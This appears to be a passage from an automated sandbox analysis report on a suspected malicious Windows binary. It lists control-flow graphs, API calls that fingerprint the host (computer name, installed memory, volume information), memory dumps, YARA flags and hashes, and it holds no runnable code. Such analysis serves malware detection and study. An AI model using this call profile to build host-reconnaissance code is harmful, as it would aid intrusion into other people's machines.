                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0365024D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: cess$kernel32.dll
                                                    • API String ID: 4275171209-1230238691
                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction ID: 84ab4675fbeaeb7c57a8e1226a149d74837793a336b84f2b91fabcefdd5c58e0
                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction Fuzzy Hash: 76526A75A01229DFDB64CF58C985BACBBB1BF09304F1480E9E94DAB351DB30AA95CF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 104 427c0b-427d06 call 4102e0 107 427d63-427d9f SysAllocString 104->107 108 427d08 104->108 109 427d0a-427d5f 108->109 109->109 110 427d61 109->110 110->107
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: AllocString
                                                    • String ID: !$%$3$6$:$;
                                                    • API String ID: 2525500382-3001093237
                                                    • Opcode ID: 33183d01ceb5a524f0c18bbdcc2b8a0325e2adc34bd19612829b3e5eac2fea1f
                                                    • Instruction ID: 1a39169d67010728743755bad08802f9e09bd0e4855d95ec92bb4768922a02a3
                                                    • Opcode Fuzzy Hash: 33183d01ceb5a524f0c18bbdcc2b8a0325e2adc34bd19612829b3e5eac2fea1f
                                                    • Instruction Fuzzy Hash: E641353010C7C58AD33ACA28C4997DFBFE25BD6314F084A5CE1E94A2C2C3B9464AC757
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 325 41e6a0-41e766 326 41e797-41e7d7 RtlExpandEnvironmentStrings 325->326 327 41e768 325->327 329 41e7e0 326->329 330 41e7d9-41e7de 326->330 328 41e770-41e795 327->328 328->326 328->328 331 41e7e3-41e867 call 435aa0 RtlExpandEnvironmentStrings 329->331 330->331 334 41e8a7-41e8b4 call 418560 331->334 335 41e869 331->335 338 41e8b9-41e8bc 334->338 336 41e870-41e8a5 335->336 336->334 336->336
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041E7CB
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 0041E7FA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: JE$N$mz
                                                    • API String ID: 237503144-108684729
                                                    • Opcode ID: 03d5809357e3963816daa3459d23f7a23414702b53542c1c910962c249b0d0e7
                                                    • Instruction ID: d4eb9d248d4042ffda66fec7adb5be2df31ff8f7ed8dd41437f0ba620aed1879
                                                    • Opcode Fuzzy Hash: 03d5809357e3963816daa3459d23f7a23414702b53542c1c910962c249b0d0e7
                                                    • Instruction Fuzzy Hash: BB5151B4108341AFD310CF02C895B4BBBE5EBC6754F108E1DF8A45B391D779D9858B96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 348 4248c4-4248d8 351 424924-42492d 348->351 352 4248da-4248ee 348->352 353 424979-42497a 351->353 354 4248f0-424920 352->354 355 42492f 352->355 357 424980-424989 353->357 354->354 358 424922 354->358 356 424931-424938 355->356 359 424955-424973 356->359 360 42493a-42494a 356->360 357->357 361 42498b-424a0b 357->361 358->356 362 424975-424977 359->362 363 42494c-424953 359->363 360->362 360->363 364 424a58-424a61 361->364 365 424a0d-424a0f 361->365 362->353 362->361 363->353 367 424a63-424a69 364->367 368 424a7b-424a87 364->368 366 424a10-424a56 365->366 366->364 366->366 369 424a70-424a79 367->369 370 424a9b-424aa6 368->370 371 424a89-424a8f 368->371 369->368 369->369 374 424ab1-424b41 call 439e90 370->374 375 424aa8-424aae call 4086f0 370->375 372 424a90-424a99 371->372 372->370 372->372 381 424b43 374->381 382 424b9e-424ba7 374->382 375->374 383 424b50-424b9c 381->383 384 424bbb-424bc7 382->384 385 424ba9-424baf 382->385 383->382 383->383 387 424bdb-424c09 call 408770 call 439e90 384->387 388 424bc9-424bcf 384->388 386 424bb0-424bb9 385->386 386->384 386->386 393 424c0e-424c18 387->393 389 424bd0-424bd9 388->389 389->387 389->389 394 424c1b-424c69 393->394 395 424c6b 394->395 396 424cb8-424cc1 394->396 397 424c70-424cb6 395->397 398 424cc3-424cc9 396->398 399 424cdb-424ce7 396->399 397->396 397->397 400 424cd0-424cd9 398->400 401 424cfb-424d09 call 439e90 399->401 402 424ce9-424cef 399->402 400->399 400->400 405 424d0e-424d7e GetComputerNameExA 401->405 403 424cf0-424cf9 402->403 403->401 403->403 406 424d80-424dc6 405->406 407 424dc8-424dd1 405->407 406->406 406->407 408 424dd3-424dd9 407->408 409 424deb-424df7 407->409 412 424de0-424de9 408->412 410 424e0b-424e78 GetComputerNameExA 409->410 411 424df9-424dff 409->411 414 424ed0-424ed9 410->414 415 424e7a 410->415 413 424e00-424e09 411->413 412->409 412->412 413->410 413->413 417 424efb-424f07 414->417 418 424edb-424ee1 414->418 416 424e80-424ece 415->416 416->414 416->416 420 424f1b-424f7c 417->420 421 424f09-424f0f 417->421 419 424ef0-424ef9 418->419 419->417 419->419 424 424fb0-424fb9 420->424 425 424f7e-424f7f 420->425 422 424f10-424f19 421->422 422->420 422->422 427 424fdb-424fe7 424->427 428 424fbb-424fc1 424->428 426 424f80-424fae 425->426 426->424 426->426 430 424ffb-425066 call 439e90 427->430 431 424fe9-424fef 427->431 429 424fd0-424fd9 428->429 429->427 429->429 436 425068 430->436 437 4250a9-4250b2 430->437 432 424ff0-424ff9 431->432 432->430 432->432 438 425070-4250a7 436->438 439 4250b4-4250ba 437->439 440 4250cb-4250d2 437->440 438->437 438->438 441 4250c0-4250c9 439->441 442 4250f7-425102 440->442 441->440 441->441 443 4251aa-425205 442->443 444 425108-42510e 442->444 447 425253-42525c 443->447 448 425207 443->448 445 4250e0-4250e2 444->445 446 425110-42512f 444->446 451 4250e7-4250f1 445->451 452 425160-425169 446->452 453 425131-425134 446->453 449 42527b-42527e call 42b150 447->449 450 42525e-425264 447->450 454 425210-425251 448->454 460 425283-42529f 449->460 455 425270-425279 450->455 451->442 457 4251a6-4251a8 451->457 452->451 459 42516f-4251a1 452->459 453->452 458 425136-425151 453->458 454->447 454->454 455->449 455->455 457->443 458->451 459->451
                                                    APIs
                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00424D2D
                                                    • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424E28
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: ComputerName
                                                    • String ID: <VXp
                                                    • API String ID: 3545744682-3522128999
                                                    • Opcode ID: ceb7df71cc771084bf12d3982bfc6851ab6c604ce51aaaf5532dc42f773fec6f
                                                    • Instruction ID: 6299c964a3fce0bafc53ea5c8286f28257e6a63a241fb0224b927437de5add70
                                                    • Opcode Fuzzy Hash: ceb7df71cc771084bf12d3982bfc6851ab6c604ce51aaaf5532dc42f773fec6f
                                                    • Instruction Fuzzy Hash: DC32FE70204B918AE725CF34C8647E3BBE1EF57309F98495EC4EB9B282C7796446CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 461 4248c7-4248d8 463 424924-42492d 461->463 464 4248da-4248ee 461->464 465 424979-42497a 463->465 466 4248f0-424920 464->466 467 42492f 464->467 469 424980-424989 465->469 466->466 470 424922 466->470 468 424931-424938 467->468 471 424955-424973 468->471 472 42493a-42494a 468->472 469->469 473 42498b-424a0b 469->473 470->468 474 424975-424977 471->474 475 42494c-424953 471->475 472->474 472->475 476 424a58-424a61 473->476 477 424a0d-424a0f 473->477 474->465 474->473 475->465 479 424a63-424a69 476->479 480 424a7b-424a87 476->480 478 424a10-424a56 477->478 478->476 478->478 481 424a70-424a79 479->481 482 424a9b-424aa6 480->482 483 424a89-424a8f 480->483 481->480 481->481 486 424ab1-424b41 call 439e90 482->486 487 424aa8-424aae call 4086f0 482->487 484 424a90-424a99 483->484 484->482 484->484 493 424b43 486->493 494 424b9e-424ba7 486->494 487->486 495 424b50-424b9c 493->495 496 424bbb-424bc7 494->496 497 424ba9-424baf 494->497 495->494 495->495 499 424bdb-424c69 call 408770 call 439e90 496->499 500 424bc9-424bcf 496->500 498 424bb0-424bb9 497->498 498->496 498->498 507 424c6b 499->507 508 424cb8-424cc1 499->508 501 424bd0-424bd9 500->501 501->499 501->501 509 424c70-424cb6 507->509 510 424cc3-424cc9 508->510 511 424cdb-424ce7 508->511 509->508 509->509 512 424cd0-424cd9 510->512 513 424cfb-424d7e call 439e90 GetComputerNameExA 511->513 514 424ce9-424cef 511->514 512->511 512->512 518 424d80-424dc6 513->518 519 424dc8-424dd1 513->519 515 424cf0-424cf9 514->515 515->513 515->515 518->518 518->519 520 424dd3-424dd9 519->520 521 424deb-424df7 519->521 524 424de0-424de9 520->524 522 424e0b-424e78 GetComputerNameExA 521->522 523 424df9-424dff 521->523 526 424ed0-424ed9 522->526 527 424e7a 522->527 525 424e00-424e09 523->525 524->521 524->524 525->522 525->525 529 424efb-424f07 526->529 530 424edb-424ee1 526->530 528 424e80-424ece 527->528 528->526 528->528 532 424f1b-424f7c 529->532 533 424f09-424f0f 529->533 531 424ef0-424ef9 530->531 531->529 531->531 536 424fb0-424fb9 532->536 537 424f7e-424f7f 532->537 534 424f10-424f19 533->534 534->532 534->534 539 424fdb-424fe7 536->539 540 424fbb-424fc1 536->540 538 424f80-424fae 537->538 538->536 538->538 542 424ffb-425066 call 439e90 539->542 543 424fe9-424fef 539->543 541 424fd0-424fd9 540->541 541->539 541->541 548 425068 542->548 549 4250a9-4250b2 542->549 544 424ff0-424ff9 543->544 544->542 544->544 550 425070-4250a7 548->550 551 4250b4-4250ba 549->551 552 4250cb-4250d2 549->552 550->549 550->550 553 4250c0-4250c9 551->553 554 4250f7-425102 552->554 553->552 553->553 555 4251aa-425205 554->555 556 425108-42510e 554->556 559 425253-42525c 555->559 560 425207 555->560 557 4250e0-4250e2 556->557 558 425110-42512f 556->558 563 4250e7-4250f1 557->563 564 425160-425169 558->564 565 425131-425134 558->565 561 42527b-42527e call 42b150 559->561 562 42525e-425264 559->562 566 425210-425251 560->566 572 425283-42529f 561->572 567 425270-425279 562->567 563->554 569 4251a6-4251a8 563->569 564->563 571 42516f-4251a1 564->571 565->564 570 425136-425151 565->570 566->559 566->566 567->561 567->567 569->555 570->563 571->563
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: <VXp
                                                    • API String ID: 0-3522128999
                                                    • Opcode ID: aa472b181c25ef4c7ff1b41997715be3b6fc59769e2fc03377bffbd232bba362
                                                    • Instruction ID: 39380498e3301fda940bb2c750f98dbafe3cac41602dcf564c309bbfc5931e86
                                                    • Opcode Fuzzy Hash: aa472b181c25ef4c7ff1b41997715be3b6fc59769e2fc03377bffbd232bba362
                                                    • Instruction Fuzzy Hash: C822FF70204B918AE725CF34C8647E3BBE1EF57305F98495EC4EB9B282C7796446CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 573 4252a4-4252b5 574 4252b7-4252f3 573->574 575 42531b-425324 573->575 576 425326-42532f 574->576 577 4252f5 574->577 575->576 578 425300-425314 575->578 579 425331-425337 576->579 580 42534b-425807 576->580 577->578 578->575 581 425340-425349 579->581 583 425849-425852 580->583 584 425809 580->584 581->580 581->581 586 425854-42585a 583->586 587 42586b-425886 call 433bb0 583->587 585 425810-425847 584->585 585->583 585->585 588 425860-425869 586->588 591 42589b-4258e5 call 439e90 GetPhysicallyInstalledSystemMemory 587->591 592 425888-42588f 587->592 588->587 588->588 596 4258e7-4258f3 591->596 597 425958-425967 591->597 593 425890-425899 592->593 593->591 593->593 598 4258f5 596->598 599 425969-42596e 596->599 600 42599c-4259eb 597->600 603 425900-425944 598->603 604 425970-425994 599->604 605 42594b-425956 599->605 601 425a39-425a81 600->601 602 4259ed-4259ef 600->602 607 425a83 601->607 608 425ae6-425aee 601->608 606 4259f0-425a37 602->606 603->603 609 425946-425949 603->609 610 425997-425999 604->610 605->610 606->601 606->606 611 425a90-425ae4 607->611 612 425af0-425af3 608->612 613 425b0b-425b13 608->613 609->604 609->605 610->600 611->608 611->611 614 425b00-425b09 612->614 615 425b15-425b16 613->615 616 425b2b-425b37 613->616 614->613 614->614 617 425b20-425b29 615->617 618 425b4b-425be4 616->618 619 425b39-425b3f 616->619 617->616 617->617 621 425c16-425c1f 618->621 622 425be6 618->622 620 425b40-425b49 619->620 620->618 620->620 624 425c21-425c27 621->624 625 425c3b-425c47 621->625 623 425bf0-425c14 622->623 623->621 623->623 626 425c30-425c39 624->626 627 425c5b-425cfc 625->627 628 425c49-425c4f 625->628 626->625 626->626 629 425c50-425c59 628->629 629->627 629->629
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (VDn$zrHu
                                                    • API String ID: 0-2980758696
                                                    • Opcode ID: 379f5229f73699a554116ef83f101bc97f7cbfca640173dcc043b3cc4881a05d
                                                    • Instruction ID: 6abb5f54dd02d2df8b74713aa4eba05006bae67069e8e73d66e3ac6d0c001b4f
                                                    • Opcode Fuzzy Hash: 379f5229f73699a554116ef83f101bc97f7cbfca640173dcc043b3cc4881a05d
                                                    • Instruction Fuzzy Hash: 67F18A70604F808BE726CF35C4A47E7BBE1AF56304F88495EC4EA9B792C779A406CB44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 762 42e3ef-42e51c SelectObject * 2 call 42ecd0 769 42e521-42e52b 762->769 770 42e532-42e55c 769->770 771 42e52d 769->771 771->770
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect
                                                    • String ID:
                                                    • API String ID: 1517587568-3916222277
                                                    • Opcode ID: e0dffe2799290b1325598bf0a61f6d8834782f29a839223cc3ea3d362ac7b798
                                                    • Instruction ID: 64c2dd33f56547eeba0a9756c00d89cd855ce22edeb25e2eb396533884e40186
                                                    • Opcode Fuzzy Hash: e0dffe2799290b1325598bf0a61f6d8834782f29a839223cc3ea3d362ac7b798
                                                    • Instruction Fuzzy Hash: 7D515CB8605B008FC364DF28D595A16BBF1FB89300F508A6DE98A8BB60D731F845CF55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 772 408df0-408dfd call 437260 775 408e01-408e08 call 432010 772->775 776 408dff 772->776 780 408e0a 775->780 781 408e0c-408e41 GetStdHandle call 408e70 call 40a290 775->781 777 408e57-408e60 ExitProcess 776->777 782 408e50-408e55 call 439460 780->782 791 408e43 781->791 792 408e45 call 4102f0 781->792 782->777 794 408e4e 791->794 795 408e4a-408e4c 792->795 794->782 795->794
                                                    APIs
                                                    Strings
                                                    • often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs, xrefs: 00408E26
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID: often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs
                                                    • API String ID: 621844428-3137510881
                                                    • Opcode ID: fa5aabe4ad16cf67e7d547b67a197814e7e1d1e69f37924dfa70f4ebd1137123
                                                    • Instruction ID: 2fd8b006e3b76f4afec7b1faa4642abc4b02275d11bc394f33c7f760dc90e6d3
                                                    • Opcode Fuzzy Hash: fa5aabe4ad16cf67e7d547b67a197814e7e1d1e69f37924dfa70f4ebd1137123
                                                    • Instruction Fuzzy Hash: 8BF06D7040C601CAD600BB61C705269B7A06F14328F20593FE8CAE12C0DF3C8486AADF
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryW.KERNELBASE(?), ref: 00437FA3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID: gRI
                                                    • API String ID: 1029625771-894747221
                                                    • Opcode ID: b924395998ae65e34cc97e97e49c83ced36f9783127f8a86a70ad9b629d00132
                                                    • Instruction ID: 2a4b3bc33ec7130f718fa133b8f83357076008803d7a7ff669a68a4f6503176c
                                                    • Opcode Fuzzy Hash: b924395998ae65e34cc97e97e49c83ced36f9783127f8a86a70ad9b629d00132
                                                    • Instruction Fuzzy Hash: 734118B41047428BD328CF29C590B13FBB1BF49304F189A9DD4928FB56C334E58ADB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00424D2D
                                                    • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424E28
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: ComputerName
                                                    • String ID:
                                                    • API String ID: 3545744682-0
                                                    • Opcode ID: df82d550106a5831d78f12e269e3e0b91f16142a182fe8660f2375e7ed7413ff
                                                    • Instruction ID: 15930a0e3456c2de96117bffaec9bf70862991a15f3db32a0408bad3ef46fb91
                                                    • Opcode Fuzzy Hash: df82d550106a5831d78f12e269e3e0b91f16142a182fe8660f2375e7ed7413ff
                                                    • Instruction Fuzzy Hash: DC22BD70204B918BE725CF34C8947E3BBE1AF56304F98495ED4EB9B782C779A406CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00435B47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: f543
                                                    • API String ID: 1279760036-424919641
                                                    • Opcode ID: 6cbb3d75488a68f00f06e546b757858c8eccb469aa893b84ba7841f44e1abc9f
                                                    • Instruction ID: 06c2186eef59e94b595ca09588689556934a3fe7b1df8413d19f3e3cff029a90
                                                    • Opcode Fuzzy Hash: 6cbb3d75488a68f00f06e546b757858c8eccb469aa893b84ba7841f44e1abc9f
                                                    • Instruction Fuzzy Hash: 3D1148741083019FD708CF14C464B6BBBA2EBC5328F248A1CE8A50B791C77AD915CBC2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00439617
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: f543
                                                    • API String ID: 1279760036-424919641
                                                    • Opcode ID: fb90c4881631728a67103a90e4af625c91e24478a3ae189eab592f5653f933f2
                                                    • Instruction ID: bcaec8aad2e54c7bb86e5c8c35838375d44d37fa2ceccc352b8ebc86a0d96e6b
                                                    • Opcode Fuzzy Hash: fb90c4881631728a67103a90e4af625c91e24478a3ae189eab592f5653f933f2
                                                    • Instruction Fuzzy Hash: 8A1109741083019FE708CF14C4A476BBBA2EBD5728F24895DE4A507691C7BAD919CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00433D3A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID: \
                                                    • API String ID: 2039140958-2967466578
                                                    • Opcode ID: 97d75a674a5be829cde8a03888e8111a6af89568cd531833de46cd4d18545e80
                                                    • Instruction ID: 4293fc51c427d059e8a1900740c0d841a4927f035155755a6a86f4fc830b078c
                                                    • Opcode Fuzzy Hash: 97d75a674a5be829cde8a03888e8111a6af89568cd531833de46cd4d18545e80
                                                    • Instruction Fuzzy Hash: 7FE04F75285701BBF328CF10ED23F2A32A59B45B05F20442DB306EA1D1D7B4B915CA6D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041DF06
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041DF31
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID:
                                                    • API String ID: 237503144-0
                                                    • Opcode ID: 4429e528902b6959771bdd2832947410f763d0ee0b9aaf0d96c237b5a8ace8fb
                                                    • Instruction ID: 7cd1955bb7ff4877b61add733c5008b9238defc5a30e4e77b50cb4d3de39835c
                                                    • Opcode Fuzzy Hash: 4429e528902b6959771bdd2832947410f763d0ee0b9aaf0d96c237b5a8ace8fb
                                                    • Instruction Fuzzy Hash: 21619D756083518FE324CF15C890BABB7E1EFCA318F014A1DE8D95B281D7789A46CB97
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL ref: 0042E066
                                                    • GetSystemMetrics.USER32 ref: 0042E077
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherMetricsSystemUser
                                                    • String ID:
                                                    • API String ID: 365337688-0
                                                    • Opcode ID: a910ae7a2649babda8153f224d949615ec8b62e997d32fa7a6b3b09d989dad0e
                                                    • Instruction ID: ec370dcdc0dee2e7242882cc56310c6ee9e1b245d348888234485e317814ae48
                                                    • Opcode Fuzzy Hash: a910ae7a2649babda8153f224d949615ec8b62e997d32fa7a6b3b09d989dad0e
                                                    • Instruction Fuzzy Hash: 0A515DB4A10B009FD364DF2DD981A26BBF5FB49704B10492DE98AC7B60D631F845CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00000400,?,?,03650223,?,?), ref: 03650E19
                                                    • SetErrorMode.KERNELBASE(00000000,?,?,03650223,?,?), ref: 03650E1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction ID: 503e7a0e90e84bceaa18598e4c5940aaa5a302146ad8f24382a252c28ba0e966
                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction Fuzzy Hash: E7D0123114512977D7002A94DC09BCDBB1CDF05B62F148021FB0DD9180C770954046E5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 00439575
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: bf3e3f96053bca1849cd9bffeedf92de85d467ab460f6b04e012a5cbc12d61f1
                                                    • Instruction ID: 1d8b2ebf96d1ba174666c76c8533ac1a669530b6b8cb3b7a98fa5c82265e6ac1
                                                    • Opcode Fuzzy Hash: bf3e3f96053bca1849cd9bffeedf92de85d467ab460f6b04e012a5cbc12d61f1
                                                    • Instruction Fuzzy Hash: 7801D7701083409FE318CF10D464B6FFBE1EBC5728F209A1DE4A91B681C3B9D959CB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
